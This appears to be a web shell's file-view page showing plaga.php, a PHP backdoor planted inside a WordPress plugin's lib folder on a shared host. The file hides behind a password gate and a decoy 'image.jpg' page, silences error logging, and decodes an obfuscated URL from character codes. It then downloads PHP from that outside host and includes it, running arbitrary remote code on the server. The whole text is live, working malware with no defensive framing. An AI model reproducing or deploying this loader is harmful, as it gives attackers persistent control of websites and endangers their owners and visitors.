HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/www/wp-content/plugins/performant-translations/lib/
Upload Files
File: //home/vitanhod/www/wp-content/plugins/performant-translations/lib/plaga.php
<?php
ini_set('session.gc_maxlifetime', 86400);
ini_set('session.cookie_lifetime', 86400);
ini_set('display_errors', 0);
ini_set('log_errors', 0);
ini_set('session.gc_probability', 1);
ini_set('session.gc_divisor', 100);
ini_set('session.use_strict_mode', 1);
ini_set('session.cookie_httponly', 1);
ini_set('session.cookie_samesite', 'Lax');
error_reporting(0);


session_start();

$hashed_password = '$2b$12$GkqIIDan04pJc9PpLS24Su/wPdGhrgb5F6uam89UsaItjabqYkTJ6';

if (isset($_GET['logout'])) {
    session_unset();
    session_destroy();
    header("Location: ?");
    exit;
}

if (!isset($_SESSION['plaga_auth'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
        if (password_verify($_POST['password'], $hashed_password)) {
            $_SESSION['plaga_auth'] = true;
            header("Location: ?");
            exit;
        }
        die("Password salah bego");
    }
    ?>
    <form method="post">
        <input type="password" name="password" placeholder="Password">
        <button type="submit">Login</button>
    </form>
    <?php
    exit;
}

if (!isset($_SESSION['logged_in'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $_SESSION['logged_in'] = true;
        header("Location: " . $_SERVER['PHP_SELF']);
        exit;
    }
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>image.jpg</title>
        <style>
            body {
                margin: 0;
                padding: 0;
                background: #fff;
                height: 100vh;
                display: flex;
                align-items: center;
                justify-content: center;
            }
            img {
                max-width: 100%;
                max-height: 100%;
            }
        </style>
        <script>
            window.onload = function() {
                document.getElementById('x').submit();
            };
        </script>
    </head>
    <body>
        <img src="image.jpg" alt="image.jpg">
        <form method="POST" id="x"></form>
    </body>
    </html>
    <?php
    exit;
}

$a = [104,116,116,112,115,58,47,47,114,117,115,100,105,46,102,117,110,47,114,97,119,47,98,98,51,54,99,50];
$url = implode('', array_map("chr", $a));

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla");
$r = curl_exec($ch);
curl_close($ch);

if ($r && strpos($r, "<?php") !== false) {
    $t = tmpfile();
    fwrite($t, $r);
    $m = stream_get_meta_data($t);
    include $m['uri'];
    fclose($t);
}
?>
@ Telegram